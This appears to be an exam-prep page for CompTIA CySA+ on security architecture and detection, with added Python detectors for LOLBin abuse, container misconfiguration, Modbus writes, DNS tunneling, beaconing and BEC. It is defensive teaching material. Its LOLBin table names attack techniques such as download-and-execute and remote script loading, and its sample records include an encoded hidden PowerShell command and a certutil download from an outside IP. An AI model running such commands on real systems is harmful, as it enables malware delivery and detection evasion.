FlashGenius
CS0-004 · Page 1 of 5 · Launches June 23, 2026

CompTIA CySA+ CS0-004 — Security Operations: Architecture & Detection

Logging, OS security, cloud & container infrastructure, IAM, OT/ICS/SCADA, and indicators of malicious activity — the foundation of every SOC analyst role.

  • Domain weight: 34%
  • Exam questions: ~29
  • Total questions: 85
  • Passing score: 750
Domain Overview
Security Operations is the largest CySA+ CS0-004 domain — 34% of the exam across two study pages.

What This Page Covers

This page covers the foundational sub-domains of Security Operations: security architecture, logging & monitoring, OS security concepts, cloud/container infrastructure, identity & access management, encryption, OT/ICS basics, and indicators of malicious activity. This is the "detection foundation" half of the domain — the tools and threat intel half is on Page 2.

Topics: Logging & Monitoring · OS Security · Cloud & Containers · IAM / PAM · OT/ICS/SCADA · Malicious Activity Indicators

๐Ÿ—๏ธ Architecture & Logging

  • Log ingestion, integrity, and retention
  • NTP synchronization for correlation
  • Windows, Linux, and cloud log sources
  • Centralized vs. distributed logging

💻 OS & Infrastructure

  • OS hardening and critical files
  • LOLBins — living off the land binaries
  • Virtualization, containers, APIs
  • ZTNA and SASE architectures

🔑 IAM, PAM & Encryption

  • PAM, RBAC, ABAC, secrets management
  • MFA types and bypass techniques
  • TLS, PKI, data at rest vs. in transit
  • Key management and certificate lifecycle

🚨 Indicators & Detection

  • Network, host, application, cloud IOCs
  • Identity indicators — impossible travel
  • BEC detection — email rule changes
  • OT/ICS protocol anomalies
💡 Exam tip: Security Operations (34%) is split across Pages 1 and 2. Expect questions to blend architecture knowledge with indicator identification — e.g., "Given this log excerpt, what type of malicious activity is occurring?"
Key Concepts
Eight expandable sections covering every exam-tested topic in this domain.
[KEY] Logging & Monitoring Architecture

Log ingestion — Logs must be collected from all relevant sources: endpoints, network devices, cloud services, applications, identity providers. A gap in ingestion = a blind spot.

  • NTP synchronization: All log sources must use synchronized time. Without NTP, timestamps are skewed and event correlation becomes unreliable or impossible. This is a classic exam topic — "why can't I correlate logs?" → NTP.
  • Log integrity & security: Logs must be protected from tampering. Write-once storage, digital signatures, and forwarding logs off the compromised host are key mechanisms.
  • Retention policies: Compliance requirements (PCI DSS = 12 months, HIPAA = 6 years) drive retention duration. Short retention = lost forensic evidence.
  • Log sources by category: Windows Event Logs (Security, System, Application), Syslog (Linux/network), auditd (Linux process/file auditing), cloud-native logs (CloudTrail, Azure Monitor, GCP Cloud Logging), application logs, identity provider logs (Okta, AD).
  • Log forwarding: Syslog (UDP 514, TCP 514, TLS 6514), Beats/Elastic agents, Windows Event Forwarding (WEF) to Windows Event Collector (WEC).
  • Centralized logging benefits: Single pane of glass, cross-source correlation, tamper resistance, compliance documentation.
โฐ NTP is always the answer when log correlation fails. Expect 1โ€“2 questions on this.
[HOT] OS Security Concepts & LOLBins

OS hardening — Reducing attack surface by removing unnecessary services, applying security baselines (CIS Benchmarks), and configuring security settings.

  • Critical Windows files: SAM database (credential hashes), NTDS.dit (AD database), registry hives (SOFTWARE, SYSTEM, SAM), event logs (.evtx), prefetch files (execution evidence).
  • Critical Linux files: /etc/passwd (user accounts), /etc/shadow (password hashes), /etc/sudoers (privilege escalation), /var/log/auth.log, /var/log/syslog, /proc/ (process information), crontab files.
  • LOLBins (Living off the Land Binaries): Legitimate OS tools abused by attackers to blend in with normal traffic and evade signature-based detection.
| LOLBin | Malicious Use | Detection Signal |
|---|---|---|
| certutil.exe | Download files, decode Base64, decode malware | Unusual network connections from certutil |
| PowerShell | Download+execute (IEX), encoded commands (-EncodedCommand), bypass execution policy | Encoded PS commands, AMSI bypass attempts |
| wscript/cscript | Execute .vbs/.js malware scripts | Script execution from temp dirs |
| mshta.exe | Execute malicious HTA files, run inline VBScript/JavaScript | mshta spawning child processes |
| regsvr32.exe | Squiblydoo attack — register remote .sct files via /i: flag | regsvr32 with network URLs |
| rundll32.exe | Execute malicious DLLs, load JavaScript via scrobj.dll | rundll32 calling unusual exports |
| bitsadmin | Download files, maintain persistence via BITS jobs | BITS jobs to external IPs |
⚠️ LOLBins bypass application allowlisting because the binary itself is trusted. Detection relies on behavioral analysis — looking at what the process does (spawns child, connects to external IP) rather than what the process is.
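The table states each detection signal in prose. As an added example (not code from this page or FlashGenius), the rules below encode those same signals over simplified Event ID 4688 process-creation records so they can be run against sample data. The records, their field names (image, parent_image, command_line) and the sample command lines are constructed for this example; the sixth record is a benign admin script that exercises a similar-looking switch without tripping the encoded-command rule.

```python
"""Behavioural LOLBin rules over Windows process-creation (Event ID 4688) records."""
import re

# Constructed records, reduced to the fields the rules need; the field names
# are this example's own, not a vendor schema.
SAMPLE_4688 = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -WindowStyle Hidden -EncodedCommand QQBCAEMA"},
    {"id": 2, "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "certutil.exe -verify corp-root.cer"},
    {"id": 3, "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "certutil.exe http://203.0.113.10/update.bin update.bin"},
    {"id": 4, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "command_line": "cmd.exe /c whoami"},
    {"id": 5, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"wscript.exe C:\Users\alice\AppData\Local\Temp\invoice.vbs"},
    {"id": 6, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s", re.IGNORECASE)
TEMP_RE = re.compile(r"[\\/](?:temp|tmp)[\\/]", re.IGNORECASE)


def base(image: str) -> str:
    """Lower-cased file name of an image path, whichever slash style the log used."""
    return re.split(r"[\\/]", image)[-1].lower()


def _net(record, *images):
    """True when the image is one of `images` and its command line carries a URL."""
    return base(record["image"]) in images and URL_RE.search(record["command_line"]) is not None


# Each rule keys off behaviour (what the process does), not the binary's name alone.
RULES = {
    "encoded_powershell": lambda r: base(r["image"]) in ("powershell.exe", "pwsh.exe")
                                    and ENCODED_RE.search(r["command_line"]) is not None,
    "certutil_network": lambda r: _net(r, "certutil.exe"),
    "regsvr32_remote": lambda r: _net(r, "regsvr32.exe"),
    "bitsadmin_network": lambda r: _net(r, "bitsadmin.exe"),
    "rundll32_scrobj": lambda r: base(r["image"]) == "rundll32.exe"
                                 and "scrobj.dll" in r["command_line"].lower(),
    "mshta_spawned_child": lambda r: base(r["parent_image"]) == "mshta.exe",
    "script_host_from_temp": lambda r: base(r["image"]) in ("wscript.exe", "cscript.exe")
                                       and TEMP_RE.search(r["command_line"]) is not None,
}


def detect(records):
    """Return sorted (record id, rule name) pairs for every rule a record trips."""
    hits = [(r["id"], name) for r in records for name, pred in RULES.items() if pred(r)]
    return sorted(hits)


if __name__ == "__main__":
    for rec_id, rule in detect(SAMPLE_4688):
        print(f"record {rec_id}: {rule}")
```

Note that record 2 (certutil verifying a certificate) and record 6 (a signed backup script run with a relaxed execution policy) are not flagged: the rules look for the network URL, the encoded payload, the temp-directory script or the suspicious parent, which is the behavioural approach the warning above calls for. Command-line auditing must be enabled for 4688 to carry the command line at all; without it every rule here except the parent-process one is blind.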
[KEY] Cloud, Virtualization & Container Infrastructure
  • Cloud-native security: Shared responsibility model — provider secures the cloud infrastructure; customer secures data, identities, workloads, and configurations.
  • Virtualization: Hypervisor (Type 1: bare-metal, e.g., VMware ESXi; Type 2: hosted, e.g., VirtualBox). VM escape attacks — malware breakout from VM to hypervisor. VM isolation is critical.
  • Containers (Docker/Kubernetes): Share the host OS kernel — lighter than VMs but smaller isolation boundary. Container security concerns: image vulnerabilities (scan with Trivy), privilege escalation via --privileged flag, lack of network policies, secrets in environment variables.
  • Kubernetes security: RBAC for pod access, Network Policies for pod-to-pod traffic control, Pod Security Standards, secrets management (Vault), admission controllers.
  • API security: Authentication (API keys, OAuth 2.0, JWT), rate limiting, input validation, logging API calls, WAF for API endpoints.
  • ZTNA (Zero Trust Network Access): Verify identity + device posture before granting least-privilege app access. Never grant broad network access. Continuous verification, not trust-once.
  • SASE (Secure Access Service Edge): Cloud-delivered framework combining SD-WAN + security services (ZTNA, CASB, SWG, FWaaS). Key distinction: SASE is the framework; ZTNA is one component.
  • Micro-segmentation: Granular network controls at the workload level, limiting lateral movement. Replaces traditional VLAN-based segmentation.
📌 Exam distinction: ZTNA is a technology/approach. SASE is a broader architectural framework delivered from the cloud. Know which is which.
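Several of the container risks listed above (the --privileged flag, secrets in environment variables, a weakened isolation boundary) can be checked mechanically from a container's runtime configuration. This added example, not code from this page or FlashGenius, audits a constructed document shaped like docker inspect output and contrasts a risky container with a hardened one. The key paths it reads (HostConfig.Privileged, HostConfig.PidMode, HostConfig.CapAdd, HostConfig.ReadonlyRootfs, Config.User, Config.Env), the check names and the capability list are assumptions to confirm against your Docker version.

```python
"""Audit container configuration for the isolation and secrets risks listed above."""
import json
import re

# Constructed, trimmed document shaped like `docker inspect` output. Only the
# keys the checks read are present; treat the key paths as assumptions.
SAMPLE_INSPECT = json.dumps([
    {
        "Name": "/billing-api",
        "Config": {
            "Image": "registry.example.invalid/billing-api:1.4.2",
            "User": "",
            "Env": ["APP_ENV=prod", "DB_PASSWORD=hunter2", "PORT=8080"],
        },
        "HostConfig": {
            "Privileged": True,
            "PidMode": "host",
            "CapAdd": ["SYS_ADMIN"],
            "ReadonlyRootfs": False,
        },
    },
    {
        "Name": "/billing-api-hardened",
        "Config": {
            "Image": "registry.example.invalid/billing-api:1.4.2",
            "User": "10001:10001",
            "Env": ["APP_ENV=prod", "PORT=8080", "DB_PASSWORD_FILE=/run/secrets/db_password"],
        },
        "HostConfig": {
            "Privileged": False,
            "PidMode": "",
            "CapAdd": None,
            "ReadonlyRootfs": True,
        },
    },
])

SECRET_NAME_RE = re.compile(r"PASS(WORD)?|SECRET|TOKEN|API[_-]?KEY|PRIVATE[_-]?KEY", re.IGNORECASE)
# Capabilities that let a process reach outside the container's boundary (example's own list)
DANGEROUS_CAPS = {"SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "NET_ADMIN", "DAC_READ_SEARCH"}


def _cap_name(cap: str) -> str:
    cap = cap.upper()
    return cap[4:] if cap.startswith("CAP_") else cap


def audit_container(spec: dict) -> list:
    """Return a list of 'check: detail' findings; an empty list means clean."""
    findings = []
    host = spec.get("HostConfig") or {}
    conf = spec.get("Config") or {}
    if host.get("Privileged"):
        findings.append("privileged: all capabilities and host devices are exposed")
    if host.get("PidMode") == "host":
        findings.append("host-pid: container shares the host PID namespace")
    for cap in host.get("CapAdd") or []:
        if _cap_name(cap) in DANGEROUS_CAPS:
            findings.append(f"cap-add: {cap} weakens the isolation boundary")
    if not host.get("ReadonlyRootfs"):
        findings.append("writable-rootfs: root filesystem is not read-only")
    if not conf.get("User"):
        findings.append("root-user: no non-root user set, process runs as uid 0")
    for entry in conf.get("Env") or []:
        name = entry.split("=", 1)[0]
        # *_FILE is the convention for pointing at a mounted secret, not the secret itself
        if SECRET_NAME_RE.search(name) and not name.upper().endswith("_FILE"):
            findings.append(f"env-secret: {name} looks like a secret stored in an environment variable")
    return findings


def audit_inspect_output(raw_json: str) -> dict:
    """Map container name -> findings for every entry in a docker-inspect style document."""
    return {spec["Name"].lstrip("/"): audit_container(spec) for spec in json.loads(raw_json)}


if __name__ == "__main__":
    for name, findings in audit_inspect_output(SAMPLE_INSPECT).items():
        print(name, "->", findings or ["clean"])
```

The hardened entry passes because the secret is delivered as a mounted file referenced by DB_PASSWORD_FILE rather than placed in the environment, the process runs as a non-root uid, and no extra capabilities or host namespaces are granted; that is the shape the Kubernetes Pod Security Standards bullet above is pushing toward.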
[KEY] Identity & Access Management (IAM / PAM)
  • PAM (Privileged Access Management): Controls, monitors, and audits access to privileged accounts (admin/root). Components: privileged account vaulting, just-in-time (JIT) access, session recording, password rotation.
  • Authentication methods: Something you know (password), something you have (token/smart card), something you are (biometric). MFA = two or more factors.
  • MFA bypass techniques (for detection): MFA fatigue attacks (flood user with push notifications), SIM swapping, OTP phishing (adversary-in-the-middle proxy), social engineering the helpdesk.
  • RBAC vs. ABAC: RBAC assigns permissions by role. ABAC uses attributes (user dept, time of day, device posture, location) for finer-grained control.
  • Secrets management: API keys, certificates, and credentials should be stored in secrets managers (HashiCorp Vault, AWS Secrets Manager), not hardcoded or in env files.
  • Federation & SSO: SAML 2.0 (XML-based, enterprise SSO), OAuth 2.0 (authorization delegation), OpenID Connect (authentication layer on OAuth). Know that SAML is assertion-based.
  • Least privilege principle: Grant only the minimum access required for the job function. Regularly review and revoke unused permissions.
Encryption & Data Protection
  • TLS (Transport Layer Security): Encrypts data in transit. TLS 1.2 and 1.3 are current standards; TLS 1.0/1.1 and SSL are deprecated. TLS 1.3 removes legacy cipher suites and enforces perfect forward secrecy.
  • PKI (Public Key Infrastructure): CA hierarchy (Root CA → Intermediate CA → Leaf cert), certificate lifecycle (issuance, renewal, revocation), CRL and OCSP for revocation checking.
  • Data at rest vs. in transit: At rest: AES-256, BitLocker, LUKS. In transit: TLS, IPsec. Data at rest encryption protects against physical theft of drives.
  • Key management: HSMs (Hardware Security Modules) for storing root keys. Key rotation, key escrow (for recovery), key destruction when no longer needed.
  • Hashing vs. encryption: Hashing is one-way (SHA-256, SHA-3) — used for integrity verification, password storage (bcrypt, Argon2). Encryption is reversible — used for confidentiality.
  • Certificate pinning: Application validates the specific certificate or public key, preventing MITM even with rogue CA. Used in mobile apps.
[KEY] OT/ICS/SCADA Security Basics

OT (Operational Technology) environments control physical processes — power grids, manufacturing, water treatment. They have unique security challenges compared to IT.

  • Purdue Model (ICS Reference Architecture): 5 levels — Level 0 (physical process/sensors), Level 1 (PLC/RTU controllers), Level 2 (SCADA/DCS supervisory), Level 3 (site operations), Level 4 (enterprise IT). The DMZ sits between Level 3 and Level 4.
  • Key OT protocols: Modbus (oldest, no authentication), DNP3 (utilities/SCADA), BACnet (building automation), EtherNet/IP, Profinet. Most lack native encryption or authentication.
  • OT vs. IT security priorities: IT prioritizes CIA (Confidentiality-Integrity-Availability). OT prioritizes AIC — Availability first, then Integrity, then Confidentiality. Downtime = physical damage or safety risks.
  • Patching challenges: OT systems often can't be patched or rebooted — compensating controls (network segmentation, monitoring) are used instead.
  • Air gaps: Physical or logical separation between OT and IT/Internet networks. Air gaps can be bridged by USB drives, compromised jump hosts, or wireless access points.
  • ICS-specific attacks: Stuxnet (PLC reprogramming), TRITON/TRISIS (safety instrumented systems), Ukraine power grid attacks (BlackEnergy/Industroyer).
⚠️ On the exam: if an OT/ICS question asks about priorities, remember Availability comes first in OT environments, unlike standard IT.
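Because Modbus accepts commands from any source, the compensating control described above (segmentation plus monitoring) needs a monitor that understands the protocol well enough to tell a read from a write. This is an added example, not code from this page or FlashGenius: it parses the Modbus/TCP MBAP header and function code and flags write function codes that arrive from outside the supervisory (Purdue Level 2) zone, without ever touching the PLC. The allowed-writer addresses and the captured frames are constructed; the write function-code set is taken from the Modbus application protocol specification.

```python
"""Passive Modbus/TCP monitor: flag write commands from outside the supervisory zone."""
import struct

# Modbus function codes that change PLC state (writes), per the Modbus spec
WRITE_FUNCTIONS = {5, 6, 15, 16, 22, 23}
MODBUS_PROTOCOL_ID = 0

# Assumption: only Level 2 supervisory hosts (HMI/SCADA) may write to PLCs.
ALLOWED_WRITERS = {"10.2.0.10", "10.2.0.11"}

# Constructed frames as captured on TCP/502: (source IP, raw bytes).
# MBAP header = transaction id (2) | protocol id (2) | length (2) | unit id (1), then PDU.
SAMPLE_FRAMES = [
    ("10.2.0.10",   bytes.fromhex("00010000000601030000000a")),      # HMI reads 10 holding registers
    ("10.2.0.10",   bytes.fromhex("000200000006010600100001")),      # HMI writes register 0x10 (allowed)
    ("10.200.5.77", bytes.fromhex("000300000006010600100000")),      # enterprise host writes a register
    ("192.0.2.44",  bytes.fromhex("000400000008010f0000000801ff")),  # unknown host writes 8 coils
    ("10.2.0.11",   bytes.fromhex("00050001000601030000000a")),      # protocol id 1: not Modbus
    ("10.2.0.11",   bytes.fromhex("0006000000")),                    # truncated frame
]


def parse_mbap(frame: bytes) -> dict:
    """Decode the MBAP header and function code; raise ValueError if not well-formed Modbus/TCP."""
    if len(frame) < 8:
        raise ValueError("frame shorter than MBAP header + function code")
    tid, proto, length, unit, function = struct.unpack(">HHHBB", frame[:8])
    if proto != MODBUS_PROTOCOL_ID:
        raise ValueError(f"protocol id {proto} is not Modbus")
    if length != len(frame) - 6:        # length counts unit id + PDU
        raise ValueError("length field does not match frame size")
    return {"transaction": tid, "unit": unit, "function": function, "data": frame[8:]}


def classify(source_ip: str, frame: bytes, allowed_writers=ALLOWED_WRITERS) -> str:
    """'ok', 'write-from-unauthorized-source' or 'malformed' for one captured frame."""
    try:
        pdu = parse_mbap(frame)
    except ValueError:
        return "malformed"
    if pdu["function"] in WRITE_FUNCTIONS and source_ip not in allowed_writers:
        return "write-from-unauthorized-source"
    return "ok"


def monitor(frames, allowed_writers=ALLOWED_WRITERS) -> list:
    """Classify every (source, frame) pair in capture order."""
    return [classify(src, raw, allowed_writers) for src, raw in frames]


if __name__ == "__main__":
    for (src, raw), verdict in zip(SAMPLE_FRAMES, monitor(SAMPLE_FRAMES)):
        print(f"{src:12s} {raw.hex():32s} {verdict}")
```

The monitor is read-only by construction: it classifies traffic seen on a SPAN port or tap and raises an alert, which is the availability-preserving posture the AIC ordering demands. Blocking would be done at the segmentation boundary, not by the monitor.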
[HOT] Network & Host Indicators of Malicious Activity

Indicators of compromise (IOCs) are artifacts that suggest a security incident. The CS0-004 exam tests identification of indicators from log excerpts and scenarios.

  • Network indicators: Rogue/unauthorized devices on network, unexpected open ports, unusual DNS queries (long subdomain strings = DNS tunneling), beaconing (regular outbound connections = C2), large outbound data transfers (exfiltration), port scanning (sequential connection attempts), unusual protocols on well-known ports.
  • Host indicators: Unexpected CPU/memory spikes, unauthorized software installations, new scheduled tasks or services, modifications to critical files (/etc/passwd, SAM), evidence of LOLBin abuse, files in unusual directories (temp, user profiles), prefetch evidence of tools that shouldn't run.
  • Application indicators: Unusual API calls, authentication from unexpected geographic locations, access to sensitive data outside normal hours, excessive failed logins followed by success (credential stuffing), unusual database queries (SQL injection indicators).
  • Cloud indicators: API calls to services never previously accessed, unusual data egress to external storage, IAM permission changes, new admin accounts created, CloudTrail disabled, security group rules opened to 0.0.0.0/0.
  • Social engineering indicators: Typosquatting domains (paypa1.com), shortened URLs masking malicious destinations, lookalike email domains (companyname-security.com).
✅ Study tip: Practice log analysis exercises. The exam presents log excerpts and asks you to identify the attack type. Know what each indicator looks like in raw log data.
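Two of the network indicators above, DNS tunneling (long subdomain strings) and C2 beaconing (regular outbound connections), are recognisable with simple statistics. The example below is added here and is not code from this page or FlashGenius; it scores constructed resolver and connection log lines, using subdomain length and entropy per (client, domain) for tunneling and the regularity of gaps between connections for beaconing. The thresholds and the two-label shortcut for the registered domain are assumptions (a real deployment would use the public suffix list).

```python
"""Score DNS query logs for tunnelling and connection logs for C2 beaconing."""
import math
from collections import Counter, defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed resolver log: (timestamp, client IP, queried name)
DNS_LOG = [
    ("2026-06-23T08:00:01", "10.0.0.5", "www.example.com"),
    ("2026-06-23T08:00:03", "10.0.0.5", "mail.example.com"),
    ("2026-06-23T08:00:05", "10.0.0.5", "x7q9w2e4r6t8y1u3i5o0p2a4s6d8f0g2h4j6k8l0z1c3v5b7.t.example.net"),
    ("2026-06-23T08:00:06", "10.0.0.5", "n9m1b3v5c7x9z1l3k5j7h9g1f3d5s7a9p1o3i5u7y9t1r3e5.t.example.net"),
    ("2026-06-23T08:00:07", "10.0.0.5", "q2w4e6r8t0y2u4i6o8p0a2s4d6f8g0h2j4k6l8z0x2c4v6b8.t.example.net"),
    ("2026-06-23T08:00:08", "10.0.0.5", "m3n5b7v9c1x3z5l7k9j1h3g5f7d9s1a3p5o7i9u1y3t5r7e9.t.example.net"),
    ("2026-06-23T08:00:09", "10.0.0.5", "w1e3r5t7y9u1i3o5p7a9s1d3f5g7h9j1k3l5z7x9c1v3b5n7.t.example.net"),
    ("2026-06-23T08:00:10", "10.0.0.7", "cdn.example.org"),
]

# Constructed connection log: (timestamp, source IP, destination IP)
CONN_LOG = [
    ("2026-06-23T08:00:00", "10.0.0.5", "198.51.100.7"),
    ("2026-06-23T08:01:00", "10.0.0.5", "198.51.100.7"),
    ("2026-06-23T08:02:01", "10.0.0.5", "198.51.100.7"),
    ("2026-06-23T08:03:00", "10.0.0.5", "198.51.100.7"),
    ("2026-06-23T08:04:01", "10.0.0.5", "198.51.100.7"),
    ("2026-06-23T08:00:10", "10.0.0.5", "192.0.2.80"),
    ("2026-06-23T08:00:40", "10.0.0.5", "192.0.2.80"),
    ("2026-06-23T08:07:20", "10.0.0.5", "192.0.2.80"),
    ("2026-06-23T08:07:32", "10.0.0.5", "192.0.2.80"),
]


def split_name(qname: str):
    """(registered domain, subdomain) using the last two labels; a simplification."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def shannon_entropy(text: str) -> float:
    """Bits per character; encoded payload scores far higher than hostnames."""
    if not text:
        return 0.0
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def dns_tunnel_suspects(log, min_queries=5, min_label_len=30, min_entropy=3.0):
    """(client, domain) pairs whose subdomains look like encoded payload, not hostnames."""
    groups = defaultdict(list)
    for _, client, qname in log:
        domain, sub = split_name(qname)
        groups[(client, domain)].append(sub)
    suspects = []
    for key, subs in groups.items():
        if len(subs) < min_queries:
            continue
        avg_len = mean([len(s) for s in subs])
        if avg_len >= min_label_len and shannon_entropy("".join(subs)) >= min_entropy:
            suspects.append(key)
    return sorted(suspects)


def beacon_suspects(log, min_connections=4, max_jitter=0.1):
    """(src, dst) pairs contacted at near-constant intervals: the C2 beacon signature."""
    times = defaultdict(list)
    for ts, src, dst in log:
        times[(src, dst)].append(datetime.fromisoformat(ts))
    suspects = []
    for key, stamps in times.items():
        if len(stamps) < min_connections:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:   # coefficient of variation
            suspects.append(key)
    return sorted(suspects)


if __name__ == "__main__":
    print("DNS tunnelling suspects:", dns_tunnel_suspects(DNS_LOG))
    print("beaconing suspects:", beacon_suspects(CONN_LOG))
```

The beacon check uses the coefficient of variation of the gaps rather than the raw interval, so a 60-second and a 3600-second beacon are caught by the same rule; real implants add jitter, which is why max_jitter is a tunable rather than a demand for exact periodicity. The second destination in the connection log has the same number of connections but irregular gaps and is not reported.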
[HOT] Identity-Based Indicators & BEC
  • Impossible travel: Same account logs in from two geographically distant locations within a timeframe that makes physical travel impossible. Example: Login from London at 08:00, login from Singapore at 08:15. Indicates credential theft, not legitimate user. Note: VPN/proxy usage can create false positives.
  • Unauthorized access patterns: Access to data or systems outside the user's normal role, access at unusual hours, access to data immediately before resignation.
  • Account creation anomalies: New admin accounts created without change management tickets, accounts created outside business hours, service accounts with interactive logon rights.
  • BEC (Business Email Compromise): Attacker compromises a legitimate business email account (vs. spoofing in phishing). BEC indicators:
    • New email forwarding rules to external addresses
    • Inbox rules deleting security alerts or sent items
    • Login from new device/location followed by rule creation
    • Mass email sending from compromised account
    • Changes to payment details or wire transfer requests
  • Distinction: BEC uses a compromised legitimate account. Phishing uses a spoofed or lookalike domain. BEC is harder to detect because the emails come from a real, trusted address.
🚨 BEC is explicitly tested on CS0-004. Know the difference between BEC (compromised account + inbox rule changes) and phishing (fake domain + lure email).
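The impossible-travel definition and the BEC indicator list above map directly onto two correlation rules. The following is an added example, not code from this page or FlashGenius, applied to constructed sign-in and mailbox audit events: a great-circle speed check that skips VPN-sourced sign-ins (the false-positive case noted above), and a rule that ties an external forwarding rule to a preceding sign-in from a never-before-seen location. The 1000 km/h threshold, the 24-hour window, the internal mail domain, the baseline of known locations and the rounded city coordinates are all assumptions; the London/Singapore and Toronto/Seoul pairs are the page's own scenarios.

```python
"""Impossible-travel scoring and BEC inbox-rule correlation over sign-in and mailbox audit events."""
import math
from collections import defaultdict
from datetime import datetime, timedelta

MAX_SPEED_KMH = 1000.0           # assumption: faster than any commercial flight
MIN_DISTANCE_KM = 50.0           # ignore GeoIP jitter inside one metro area
RULE_WINDOW = timedelta(hours=24)
INTERNAL_DOMAIN = "corp.example"  # assumption: the organisation's mail domain

# Constructed sign-ins; coordinates are approximate. via_vpn marks a sign-in through
# a corporate VPN exit, whose geolocation says nothing about where the user is.
SIGNINS = [
    {"user": "alice", "time": datetime(2026, 6, 23, 8, 0),   "city": "London",    "lat": 51.51, "lon": -0.13,  "via_vpn": False},
    {"user": "alice", "time": datetime(2026, 6, 23, 8, 15),  "city": "Singapore", "lat": 1.35,  "lon": 103.82, "via_vpn": False},
    {"user": "bob",   "time": datetime(2026, 6, 23, 9, 0),   "city": "Toronto",   "lat": 43.65, "lon": -79.38, "via_vpn": False},
    {"user": "bob",   "time": datetime(2026, 6, 23, 9, 45),  "city": "Seoul",     "lat": 37.57, "lon": 126.98, "via_vpn": False},
    {"user": "carol", "time": datetime(2026, 6, 23, 9, 0),   "city": "New York",  "lat": 40.71, "lon": -74.01, "via_vpn": False},
    {"user": "carol", "time": datetime(2026, 6, 23, 12, 0),  "city": "Boston",    "lat": 42.36, "lon": -71.06, "via_vpn": False},
    {"user": "dave",  "time": datetime(2026, 6, 23, 10, 0),  "city": "Frankfurt", "lat": 50.11, "lon": 8.68,   "via_vpn": True},
    {"user": "dave",  "time": datetime(2026, 6, 23, 10, 20), "city": "Chicago",   "lat": 41.88, "lon": -87.63, "via_vpn": False},
]

# Cities each account has been seen from before (assumption: built from a 30-day baseline)
KNOWN_LOCATIONS = {"alice": {"London"}, "bob": {"Toronto"}, "carol": {"New York", "Boston"}, "dave": {"Chicago"}}

# Constructed mailbox audit events; "New-InboxRule" is the Exchange Online operation name
MAILBOX_AUDIT = [
    {"user": "bob",   "time": datetime(2026, 6, 23, 10, 10), "action": "New-InboxRule", "forward_to": "bob.backup@webmail.invalid"},
    {"user": "carol", "time": datetime(2026, 6, 23, 13, 0),  "action": "New-InboxRule", "forward_to": "team-inbox@corp.example"},
]


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points on a 6371 km sphere."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi, dlam = math.radians(lat2 - lat1), math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(a))


def impossible_travel(signins):
    """(user, from, to, km/h) for consecutive sign-ins that would need an impossible speed."""
    by_user = defaultdict(list)
    for s in signins:
        by_user[s["user"]].append(s)
    hits = []
    for user, events in by_user.items():
        events.sort(key=lambda e: e["time"])
        for a, b in zip(events, events[1:]):
            if a["via_vpn"] or b["via_vpn"]:
                continue                  # VPN exit nodes are the classic false-positive source
            km = haversine_km(a["lat"], a["lon"], b["lat"], b["lon"])
            if km < MIN_DISTANCE_KM:
                continue
            hours = (b["time"] - a["time"]).total_seconds() / 3600
            speed = km / hours if hours > 0 else math.inf
            if speed > MAX_SPEED_KMH:
                hits.append((user, a["city"], b["city"], round(speed)))
    return sorted(hits)


def bec_rule_suspects(signins, mailbox_audit, known_locations):
    """Users who created an external forwarding rule shortly after a sign-in from a new location."""
    suspects = set()
    for rule in mailbox_audit:
        if rule["action"] != "New-InboxRule":
            continue
        if rule["forward_to"].rsplit("@", 1)[-1].lower() == INTERNAL_DOMAIN:
            continue                      # internal forwarding is normal delegation
        for s in signins:
            if s["user"] != rule["user"] or s["city"] in known_locations.get(s["user"], set()):
                continue
            if timedelta(0) <= rule["time"] - s["time"] <= RULE_WINDOW:
                suspects.add(rule["user"])
    return sorted(suspects)


if __name__ == "__main__":
    for user, src, dst, speed in impossible_travel(SIGNINS):
        print(f"impossible travel: {user} {src} -> {dst} ({speed} km/h)")
    print("BEC rule suspects:", bec_rule_suspects(SIGNINS, MAILBOX_AUDIT, KNOWN_LOCATIONS))
```

Carol's New York to Boston pair (about 300 km in three hours) and Dave's VPN-sourced sign-in are both left alone, which is the point of the distance floor and the VPN skip. Bob is reported by both rules, the combination the page calls out as the strongest BEC signal: a sign-in from a new country followed within hours by a rule forwarding mail outside the organisation.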
Study Checklist
  • Logging: Explain why NTP synchronization is critical for log correlation in a SIEM
  • Logging: Name at least 5 log sources and which security events each captures
  • Logging: Understand log integrity mechanisms (write-once, off-host forwarding, digital signatures)
  • OS: Identify the 7 most commonly abused LOLBins and their malicious use cases
  • OS: Know critical Windows and Linux files that attackers target or modify
  • Cloud: Explain the shared responsibility model and what the customer is responsible for
  • Cloud: Describe container security risks vs. VM isolation differences
  • Cloud: Differentiate ZTNA from SASE — know which is a component of the other
  • IAM: Define PAM and its four core capabilities (vaulting, JIT, session recording, rotation)
  • IAM: Know three MFA bypass techniques attackers use and how to detect them
  • IAM: Differentiate SAML, OAuth 2.0, and OpenID Connect by use case
  • OT/ICS: Describe the Purdue Model's 5 levels and where the DMZ sits
  • OT/ICS: Explain why OT prioritizes Availability over Confidentiality (AIC vs. CIA)
